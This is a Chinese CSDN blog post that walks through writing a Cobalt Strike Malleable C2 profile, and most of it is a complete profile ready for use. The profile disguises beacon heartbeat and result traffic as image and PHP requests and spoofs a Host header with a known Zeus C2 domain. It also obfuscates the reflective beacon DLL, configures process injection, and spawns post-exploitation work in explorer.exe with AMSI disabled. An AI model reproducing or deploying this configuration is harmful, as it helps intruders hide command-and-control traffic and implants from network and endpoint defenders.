从0写一个cs的profile文件

最新推荐文章于 2024-05-14 15:15:00 发布
最新推荐文章于 2024-05-14 15:15:00 发布
阅读量2.1k 收藏 9
点赞数 3
分类专栏: 内网渗透 cobalt strike相关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/118381131
版权

文章目录

前言

cs的profile文件可以修改流量特征以及修改beacon的默认行为,目的是为了让通信变得更加隐蔽。

我们首先需要知道profile文件具体可以修改以下几个部分的特征:

  1. get请求内容
  2. post请求内容
  3. 被远程加载的beacon.dll的特征
  4. 远程加载beacon.dll的uri
  5. 进程注入的具体细节
  6. 后渗透模块的特征修改

开始

1. 修改所有http通信的所有流量特征

#http-get模块控制心跳包的具体细节
http-get {

    set uri "/news/pictures/animals/cat.jpg /ca /dpixel /__utm.gif /pixel.gif /g.pixel /dot.gif /updates.rss /fwlink /cm /cx /pixel /match /visit.js /load /push /ptj /j.ad /ga.js /en_US/all.js /activity /IE9CompatViewList.xml";# 设置get请求涉及到的uri,get请求一般是心跳包,beacon会随机从里面找一个请求

    client {

        header "Accept" "*/*";
        header "Connection" "Close";

        # throw in a known/old Zeus C2 domain
        header "Host" "sharouretarot.com";
        #header "Cache-Control" "max-age=0";
        header "Accetp" "text/html;image/png;";

        # 将元数据放在cookie头中,并进行base64编码。
        metadata {
            base64;
            prepend "uuid_tt_dd=10_306329eXixmCiGSrA==4863-704131;tokenInfo=SownINownOnewom";
            append  "/sOBwoNmqvsnw6wo==";

            header "Cookie";
        }
    }

    server {
    # 如果服务端有任务,则会放在http body部分回传给client。
        header "Server" "openresty";
        header "Content-Type" "image/jpeg";
        header "Connection" "close";
        header "X-Powered-By" "PHP/5.3.8.2";
        header "etag" "AAA8B5E75E9B26545E5E2C660A2192AC";
        header "content-md5" "q3i1516bJlReXixmCiGSrA==";
        header "accept-ranges" "bytes";

        output {
        	base64;
        	prepend "JenwOnelwPOJWnNWnibwOBobUWboBOWbjoebowOmMnwnnnBnvTT";

        	append "/wIiWinwUoNbOiwebiUoneOeiwnI";
            print;
        }
    }
    }


#http-post控制命令执行结果传输的具体细节
http-post {
	# 主要用于传输任务执行结果的回显。

    set uri "/news/messageboard/customer/operation.php";

    client {

        header "Accept" "*/*";
        header "Connection" "Keep-Alive";

        # throw in a known/old Zeus C2 domain
        header "Host" "sharouretarot.com";
        header "Cache-Control" "no-cache";

        id {
            netbios;
            parameter "token_number";
        }

        output {
        	base64;
        	prepend "OnwowIBBv:c2xkbWw7ZnFsO25";
        	append "/sdfbqwiehgpihasoidjgoijqw==";
            print;
        }
    }

    server {
        header "Server" "apache/*";
        header "Content-Type" "text/html";
        header "Connection" "close";
        header "X-Powered-By" "PHP/5.3.8.2";

        output {
        	base64;
        	prepend "info_ejw:ojoiqweoijiowquer=";
            print;
        }
    }
}

#http-stager控制分阶段传输payload的具体细节
http-stager {
	#控制分阶段下载payload的方式
	set uri_x86 "/fish.jpg"; 
	set uri_x64 "/dog.jpg";

	client { 
		parameter "id" "129u19"; 
		header "Cookie" "uuid_tt_dd=10_30632999610-1600137954863-129u19; "; 
	}
	server { 
		header "Content-Type" "image/gif"; 
		output { 
			prepend "GIF89a"; 
			print;
			}
	} 
}


#http-config控制全局配置http服务器的细节
http-config{
	set trust_x_forwarded_for "true";
}

2. 修改被反射的beacon.dll文件的具体特征


#stage模块控制beacon.dll文件的具体细节
stage {	
	set userwx		   "false"; #规避rwx权限的内存分配
	set obfuscate	   "true";  #混淆IAT
	set cleanup        "true";	#释放不必要的内存

	set checksum       "0";
	set sleep_mask     "true" ; #内存混淆
	set compile_time   "15 May 1980 13:25:14";
	set entry_point    "7440";
	set name           "wkscli.dll";
	set rich_header    "\xa9\x72\xd8\xe1\xed\x13\xb6\xb2\xed\x13\xb6\xb2\xed\x13\xb6\xb2\xb6\x7b\xb7\xb3\xef\x13\xb6\xb2\xe4\x6b\x25\xb2\xc6\x13\xb6\xb2\xed\x13\xb7\xb2\x99\x17\xb6\xb2\xb6\x7b\xb2\xb3\xe4\x13\xb6\xb2\xb6\x7b\xb5\xb3\xef\x13\xb6\xb2\xb6\x7b\xb3\xb3\xfd\x13\xb6\xb2\xb6\x7b\xb6\xb3\xec\x13\xb6\xb2\xb6\x7b\xbb\xb3\xc5\x13\xb6\xb2\xb6\x7b\x4b\xb2\xec\x13\xb6\xb2\xb6\x7b\x49\xb2\xec\x13\xb6\xb2\xb6\x7b\xb4\xb3\xec\x13\xb6\xb2\x52\x69\x63\x68\xed\x13\xb6\xb2\x00\x00\x00\x00\x00\x00\x00\x00";
	# 被编译器插入到PE文件中的元信息

	set stomppe "false"; # 轻度代码混淆
	stringw "nsp.dll"; 
	stringw ".tmp";
	stringw "eqoi.js";
	stringw "SeShutdownPrivilege";
	stringw "guest";
	stringw "TSeTcbPrivilege";
	stringw ".exe";
	stringw "HKLM\\SOFTWARE\\Microsoft";
	stringw "sysvol";
	stringw "Services.msc";
	stringw "wmic";
	stringw "gpedit";
	stringw "kernel32.dll";
	stringw "#1231";
	stringw "wkscli.dll";
	stringw "e.dat";
	stringw "ntdll.dll";
	stringw "del \"%s\"";
	stringw "copy .exe .";
	stringw "systeminfo";
	# 将上述数据添加到.rdata节,以宽字符串的形式(UTF-16LE)

	# 添加以0结尾的字符串。

	# get rid of some standard Cobalt Strike stuff.
	transform-x86 {
		append "\x56\x67\x37\x76\x82\xb2\xb6\x7b\xb5\xb3\xef\x13\xb6\xb2\xb6\x7b\xb3\xb3\xfd\x13\xb6\xb2\xb6\x81\x56\x67\x37\x76\x82\x81\x56\x67\x37\x76\x82\x81";
		prepend "\x67\x43\x67\x56\x67\x37\x76\x82\x81\x56\x67\x37\x76\x82\x81\x77";
		strrep "beacon.dll" "wkscli.dll";
		strrep "ReflectiveLoader" "ipconfig";
	}

	transform-x64 {
		append "\x56\x67\x37\x76\x56\x67\xb2\xb6\x7b\xb5\xb3\xef\x13\xb6\xb2\xb6\x7b\xb3\xb3\xfd\x13\xb6\xb2\xb6\x37\x76\x82\x81\x56\x67\x37\x76\x82\x81\x82\x81";
		prepend "\x67\x43\x67\x77\x56\x67\x37\x76\x82\x81\x56\x67\x37\x76\x82\x81";
		strrep "beacon.x64.dll" "wkscli.dll";
		strrep "ReflectiveLoader" "ipconfig";
	}
}

3. 修改进程注入的具体细节

#process-inject控制进程注入的具体细节
process-inject {
	set allocator	"NtMapViewOfSection";
	execute {
		CreateThread "ntdll.dll!NtOpenProcess0x78";
		RtlCreateUserThread;
	}

}


#post-ex控制后渗透模块特定进程注入过程例如hashdump的具体细节
post-ex{
	set spawnto_x86 "%windir%\\syswow64\\explorer.exe"; 
	set spawnto_x64 "%windir%\\explorer.exe";
	set obfuscate "true";
	set smartinject "true";
	set pipename "iwnoqnw_pip";
	set amsi_disable "true";
}

完整代码:

set sample_name "ex"; # 文件名
set sleeptime "30000";  # 睡眠时间,单位为毫秒
set jitter    "15";		# 抖动频率,百分之5

#set maxdns    "255";	# 通过DNS来上传数据的时候的最大hostname长度
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";


stage {	
	set userwx		   "false";
	set obfuscate	   "true";
	set cleanup        "true";
	set checksum       "0";
	set sleep_mask     "true" ;
	set compile_time   "15 May 1980 13:25:14";
	set entry_point    "7440";
	set name           "wkscli.dll";
	set rich_header    "\xa9\x72\xd8\xe1\xed\x13\xb6\xb2\xed\x13\xb6\xb2\xed\x13\xb6\xb2\xb6\x7b\xb7\xb3\xef\x13\xb6\xb2\xe4\x6b\x25\xb2\xc6\x13\xb6\xb2\xed\x13\xb7\xb2\x99\x17\xb6\xb2\xb6\x7b\xb2\xb3\xe4\x13\xb6\xb2\xb6\x7b\xb5\xb3\xef\x13\xb6\xb2\xb6\x7b\xb3\xb3\xfd\x13\xb6\xb2\xb6\x7b\xb6\xb3\xec\x13\xb6\xb2\xb6\x7b\xbb\xb3\xc5\x13\xb6\xb2\xb6\x7b\x4b\xb2\xec\x13\xb6\xb2\xb6\x7b\x49\xb2\xec\x13\xb6\xb2\xb6\x7b\xb4\xb3\xec\x13\xb6\xb2\x52\x69\x63\x68\xed\x13\xb6\xb2\x00\x00\x00\x00\x00\x00\x00\x00";
	# 被编译器插入到PE文件中的元信息

	set stomppe "false"; # 轻度代码混淆
	stringw "nsp.dll"; 
	stringw ".tmp";
	stringw "eqoi.js";
	stringw "SeShutdownPrivilege";
	stringw "guest";
	stringw "TSeTcbPrivilege";
	stringw ".exe";
	stringw "HKLM\\SOFTWARE\\Microsoft";
	stringw "sysvol";
	stringw "Services.msc";
	stringw "wmic";
	stringw "gpedit";
	stringw "kernel32.dll";
	stringw "#1231";
	stringw "wkscli.dll";
	stringw "e.dat";
	stringw "ntdll.dll";
	stringw "del \"%s\"";
	stringw "copy .exe .";
	stringw "systeminfo";
	# 将上述数据添加到.rdata节,以宽字符串的形式(UTF-16LE)

	# 添加以0结尾的字符串。

	# get rid of some standard Cobalt Strike stuff.
	transform-x86 {
		prepend "\xB6\x84\x38";
		strrep "beacon.dll" "wkscli.dll";
		strrep "ReflectiveLoader" "ipconfig";
	}

	transform-x64 {
		prepend "\x90\x90\x90";
		strrep "beacon.x64.dll" "wkscli.dll";
		strrep "ReflectiveLoader" "ipconfig";
	}
}

http-get {

    set uri "/news/pictures/animals/cat.jpg /ca /dpixel /__utm.gif /pixel.gif /g.pixel /dot.gif /updates.rss /fwlink /cm /cx /pixel /match /visit.js /load /push /ptj /j.ad /ga.js /en_US/all.js /activity /IE9CompatViewList.xml";# 设置get请求涉及到的uri,get请求一般是心跳包,beacon会随机从里面找一个请求

    client {

        header "Accept" "*/*";
        header "Connection" "Close";

        # throw in a known/old Zeus C2 domain
        header "Host" "sharouretarot.com";
        #header "Cache-Control" "max-age=0";
        header "Accetp" "text/html;image/png;";

        # 将元数据放在cookie头中,并进行base64编码。
        metadata {
            base64;
            prepend "uuid_tt_dd=10_306329;tokenInfo=SownINownOnewom";
            append  "/sOBwoNmqvsnw6wo==";
            header "Cookie";
        }
    }

    server {
    # 如果服务端有任务,则会放在http body部分回传给client。
        header "Server" "openresty";
        header "Content-Type" "image/jpeg";
        header "Connection" "close";
        header "X-Powered-By" "PHP/5.3.8.2";
        header "etag" "AAA8B5E75E9B26545E5E2C660A2192AC";
        header "content-md5" "q3i1516bJlReXixmCiGSrA==";
        header "accept-ranges" "bytes";

        output {
        	base64;
        	prepend "JenwOnelwPOJWnNWnibwOBobUWboBOWbjoebowOmMnwnnnBnvTT";

        	append "/wIiWinwUoNbOiwebiUoneOeiwnI";
            print;
        }
    }
    }

http-post {
	# 主要用于传输任务执行结果的回显。

    set uri "/news/messageboard/customer/operation.php";

    client {

        header "Accept" "*/*";
        header "Connection" "Keep-Alive";

        # throw in a known/old Zeus C2 domain
        header "Host" "sharouretarot.com";
        header "Cache-Control" "no-cache";

        id {
            netbios;
            parameter "token_number";
        }

        output {
        	base64;
        	prepend "OnwowIBBv:c2xkbWw7ZnFsO25";
        	append "/sdfbqwiehgpihasoidjgoijqw==";
            print;
        }
    }

    server {
        header "Server" "apache/*";
        header "Content-Type" "text/html";
        header "Connection" "close";
        header "X-Powered-By" "PHP/5.3.8.2";

        output {
        	base64;
        	prepend "info_ejw:ojoiqweoijiowquer=";
            print;
        }
    }
}


http-stager {
	#控制分阶段下载payload的方式
	set uri_x86 "/fish.jpg"; 
	set uri_x64 "/dog.jpg";

	client { 
		parameter "id" "129u19"; 
		header "Cookie" "uuid_tt_dd=10_30632999610-1600137954863-129u19; "; 
	}
	server { 
		header "Content-Type" "image/gif"; 
		output { 
			prepend "GIF89a"; 
			print;
			}
	} 
}
https-certificate {
	set CN "Tecent";
	set  OU "TC";
	set O "Tecent";
	set  L "Beijing";
	set ST "DC";
	set C "US";
}
code-signer{
	set keystore "perfect.store";
	set password "78787878";
	set alias "shanfenglan";
}
http-config{
	set trust_x_forwarded_for "true";
}

process-inject {
	set allocator	"NtMapViewOfSection";
	execute {
		CreateThread "ntdll.dll!NtOpenProcess0x78";
		RtlCreateUserThread;
	}

}



#post-ex控制后渗透模块特定进程注入过程例如hashdump的具体细节
post-ex{
	set spawnto_x86 "%windir%\\syswow64\\explorer.exe"; 
	set spawnto_x64 "%windir%\\explorer.exe";
	set obfuscate "true";
	set smartinject "true";
	set pipename "iwnoqnw_pip";
	set amsi_disable "true";
}

写完之后记得用./c2lint profile的名字去测试

参考文章

malleable_profile文件配置概述
Malleable C2

Shanfenglan7
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
8、Profile
cs1991_的博客
07-09 209
开发者在项目发布之前,一般需要频繁地在开发环境、测试环境及生产环境之间进行切换,这个时候大量的配置需要频繁更改,例如数据库配置 、redis配置、jms配置等,频繁修改带来了巨大的工作量,Spring对此提供了解决方案,即@Profile注解,SpringBoot则更进一步提供了更加简洁的解决方案,SpringBoot中约定不同的环境下配置文件名称规则为application-{profile}.properties,profile占位符表示当前环境的名称,具体配置步骤如下: 1、创建配置文件 首先在res
CS Profile学习笔记
m0_62466350的博客
01-13 1051
下面是cs profile的学习笔记,可能会有点乱。下图是使用cs攻击的一个流程图。当受害机A出网时,我们可以让其通过HTTP(S)/DNS协议来和我们的TeamServer通信,而如果遇到不出网的情况下,比如受害机B,就需要通过受害机A做流量中转,然后连接到我们的TeamServer。而在内网中,有各种各样的设备在检测流量,比如说NDR,这时候就需要我们对我们的流量进行一个混淆、加密,来躲避检测。
流量加密-隐藏攻击痕迹
最新发布
m0_61869253的博客
05-14 1047
> 命名管道也被称为FIFO文件,它是一种特殊类型的文件,它在文件系统中以文件名的形式存在,但是它的行为却和之前所讲的没有名字的管道(匿名管道)类似。> > 由于Linux中所有的事物都可被视为文件,所以对命名管道的使用也就变得与文件操作非常的统一,也使它的使用非常方便,同时我们也可以像平常的文件名一样在命令中使用使用wireshark分析流量,可以看到 tcp 流中全部为乱码。
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
Love&Share
12-18 3061
本文将会介绍红队攻击中一些常见的流量加密混淆的方法
CS+cfCDN遇到的坑
Named1ess
09-03 394
c2lint检验profile报错也能正常使用 cf要设置https强制跳转(推荐设置全√就行) 监听器要用443端口和https
mysql中profile的使用方法教程
09-09
总结来说,`PROFILE`在MySQL中是用于分析SQL执行性能的一个临时性工具,而在较新版本中,`Performance Schema`应作为首选的性能监控和诊断工具。理解并正确使用这些工具对于优化数据库性能和提升应用效率至关重要。
第02章PhotoshopCS5 文件的基本操作.zip
04-14
选区工具是另一个关键部分,包括矩形、椭圆、套索、魔术棒等,用于选择图像的特定区域进行编辑。同时,快速选择工具和魔棒工具能快速准确地选取相似颜色的区域,便于剪切、复制、移动或应用效果。 此外,编辑工具如...
MySqlProfile
07-21
在给定的压缩包文件中,我们有四个文件,其中三个是.cs源代码文件,通常用于编C#代码,而另一个是安装说明,可能是文本文件或者PDF,用于指导用户如何配置和部署这个MySQLProfile系统。 在Asp.net开发中,MySQL...
实验七 Linux中的分区与文件系统.docx
02-22
例如,`mkfs -t ext3 /dev/sda5`创建一个ext3文件系统,`mkfs -t vfat /dev/sda6`创建一个vfat(FAT32)文件系统。这两种文件系统分别适用于Linux系统和Windows跨平台交互。 3. **检查文件系统**: - `fsck`命令...
jonykarki:添加配置文件自述文件,并每12小时更新一次我推文的最新屏幕截图
03-20
得克萨斯大学泰勒分校大三学生(数学,理学学士,CS)。 Kaggle笔记本和讨论专家。人。 :speech_balloon:向我询问有关机器学习,数学,计算机科学的信息 :closed_mailbox_with_raised_flag:如何联系我: 最近的...
隐藏你的C2(使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器)
Love&Share
12-17 2903
本文将会介绍使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器
malleable_profile文件配置概述
ATpiu的博客
02-16 570
malleable_profile文件配置概述
内网渗透神器CobaltStrike之Profile文件(十)
xf555er的博客
08-21 825
在网络渗透测试和红队模拟攻击中,隐藏命令与控制(C2)流量的特征对于成功绕过入侵检测系统至关重要。Cobalt Strike提供了一个强大的工具——Malleable C2 profiles,用于自定义C2流量,从而使其看起来像正常的网络流量。下面我们就一起来学习如何使用和自定义这些profile
Cobalt Strike Profile 学习记录
darkb1rd的博客
04-21 2762
此处以最新版 jquery-c2.4.3.profile 为例,学习记录各项配置的作用。部分配置尚未研究清楚适用场景,后续继续学习再补充。 cobalt strike 4.3 官方文档:https://cobaltstrike.com/downloads/csmanual43.pdf 提示 关于参数与值: profile 文件将参数括在双引号中,而不是单引号中。例如:正确: set useragent "SOME AGENT"; 错误: set useragent 'SOME AGENT'; 一些
Cobalt Strike 的 Beacon 使用介绍以及 Profile 文件修改Beacon内存教程
W小哥
08-23 3361
1、内存段是rwx权限2、内存中有 beacon 字符串3、内存中有 ReflectiveLoader 字符串。
网络安全进阶篇之流量加密(十三章-3)CS生成ssl证书修改c2 profile 加密流量逃逸检测
划水的小白白
05-19 3422
文章目录零、为什么要对CS进行流量加密一、 生成免费的 ssl 证书二、 创建并修改 C2-profile 文件三、 检测 C2 profile 文件是否可用四、 配置 teamserver 文件运行上线五、 抓取流量 零、为什么要对CS进行流量加密 cobalt strike 是很多红队的首选的攻击神器,在 APT 方面近几年应用范围很广, 很多著名的团队都曾使用这个工具进行 APT,效果显著。 导致很多 ids 入侵检测工具和流量检测工具已经可以拦截和发现, 特别是流量方面,如果使用默认证书进行渗
用python一个cs脚本
03-13
我可以回答这个问题。使用Python编C#脚本需要使用IronPython,它是一个Python解释器,可以在.NET框架中运行Python代码。您需要安装IronPython并将其添加到Visual Studio项目中,然后就可以使用Python编C#脚本了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值